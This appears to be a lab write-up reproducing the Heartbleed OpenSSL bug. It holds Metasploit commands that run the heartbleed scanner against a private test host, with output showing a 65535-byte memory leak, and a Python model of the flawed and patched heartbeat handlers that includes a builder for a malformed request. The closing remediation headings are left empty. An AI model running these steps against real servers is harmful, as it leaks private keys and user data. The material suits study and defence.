HEARTBLEED vulnerability reproduction
Two articles analyzing the vulnerability
https://blog.csdn.net/javajiawei/article/details/82429886
The output below is only shown after running set verbose true.
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134
rhosts => 172.16.20.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 172.16.20.134:443 - Sending Client Hello...
[*] 172.16.20.134:443 - SSL record #1:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 86
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 82
[*] 172.16.20.134:443 - Type: Server Hello (2)
[*] 172.16.20.134:443 - Server Hello Version: 0x0301
[*] 172.16.20.134:443 - Server Hello random data: 5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b
[*] 172.16.20.134:443 - Server Hello Session ID length: 32
[*] 172.16.20.134:443 - Server Hello Session ID: cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af
[*] 172.16.20.134:443 - SSL record #2:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 909
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 905
[*] 172.16.20.134:443 - Type: Certificate Data (11)
[*] 172.16.20.134:443 - Certificates length: 902
[*] 172.16.20.134:443 - Data length: 905
[*] 172.16.20.134:443 - Certificate #1:
[*] 172.16.20.134:443 - Certificate #1: Length: 899
[*] 172.16.20.134:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>
[*] 172.16.20.134:443 - SSL record #3:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 331
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 327
[*] 172.16.20.134:443 - Type: Server Key Exchange (12)
[*] 172.16.20.134:443 - SSL record #4:
[*] 172.16.20.134:443 - Type: 22
[*] 172.16.20.134:443 - Version: 0x0301
[*] 172.16.20.134:443 - Length: 4
[*] 172.16.20.134:443 - Handshake #1:
[*] 172.16.20.134:443 - Length: 0
[*] 172.16.20.134:443 - Type: Server Hello Done (14)
[*] 172.16.20.134:443 - Sending Heartbeat...
[*] 172.16.20.134:443 - Heartbeat response, 65535 bytes
[+] 172.16.20.134:443 - Heartbeat response with leak
[*] 172.16.20.134:443 - Printable info leaked: [the 65535-byte leaked memory dump is omitted here]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
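The 65535-byte heartbeat response above is the symptom of the bug: the server echoed as many bytes as the request claimed, not as many as it received. As an added illustration (not code from this page or from OpenSSL), the following Python model puts the pre-fix logic beside the patched RFC 6520 length check; the record layout and constants follow the RFCs, while adjacent_heap and the sample requests are constructed stand-ins for this example.

```python
import struct
from typing import Optional

# TLS record header (RFC 5246) and heartbeat extension (RFC 6520) constants
CONTENT_TYPE_HEARTBEAT = 24
HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
HEARTBEAT_MIN_PADDING = 16
TLS_1_0 = 0x0301  # record version seen in the transcript above

def parse_tls_record(data: bytes) -> bytes:
    """Return the fragment of one heartbeat record after checking its header."""
    content_type, _version, length = struct.unpack("!BHH", data[:5])
    fragment = data[5:5 + length]
    if content_type != CONTENT_TYPE_HEARTBEAT or len(fragment) != length:
        raise ValueError("not a complete heartbeat record")
    return fragment

def handle_heartbeat_vulnerable(fragment: bytes, adjacent_heap: bytes) -> bytes:
    """Pre-fix logic, simulated: trusts payload_length and copies that many bytes
    from where the payload starts. adjacent_heap is a constructed stand-in for
    whatever happened to follow the record buffer in process memory."""
    (payload_len,) = struct.unpack("!H", fragment[1:3])
    memory = fragment + adjacent_heap        # model of the surrounding heap
    payload = memory[3:3 + payload_len]      # over-reads when payload_len is a lie
    return (bytes([HEARTBEAT_RESPONSE]) + struct.pack("!H", payload_len)
            + payload + b"\x00" * HEARTBEAT_MIN_PADDING)

def handle_heartbeat_patched(fragment: bytes) -> Optional[bytes]:
    """Post-fix logic: silently discard (RFC 6520 section 4) any request whose
    claimed payload plus header and minimum padding exceeds the record length."""
    if len(fragment) < 1 + 2 + HEARTBEAT_MIN_PADDING:
        return None
    hb_type = fragment[0]
    (payload_len,) = struct.unpack("!H", fragment[1:3])
    if hb_type != HEARTBEAT_REQUEST or 1 + 2 + payload_len + HEARTBEAT_MIN_PADDING > len(fragment):
        return None
    payload = fragment[3:3 + payload_len]    # only bytes the peer actually sent
    return (bytes([HEARTBEAT_RESPONSE]) + struct.pack("!H", payload_len)
            + payload + b"\x00" * HEARTBEAT_MIN_PADDING)

def build_heartbeat_record(claimed_len: int, payload: bytes) -> bytes:
    """Constructed sample request; claimed_len may disagree with len(payload)."""
    fragment = (bytes([HEARTBEAT_REQUEST]) + struct.pack("!H", claimed_len)
                + payload + b"\x00" * HEARTBEAT_MIN_PADDING)
    return struct.pack("!BHH", CONTENT_TYPE_HEARTBEAT, TLS_1_0, len(fragment)) + fragment
```

Feeding build_heartbeat_record(0xFFFF, b"ping") to both handlers shows the difference: the patched handler returns None and sends nothing, while the simulated pre-fix handler echoes whatever adjacent_heap contained.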
WooYun case
Detailed description:
Proof of vulnerability:
Remediation:
Patch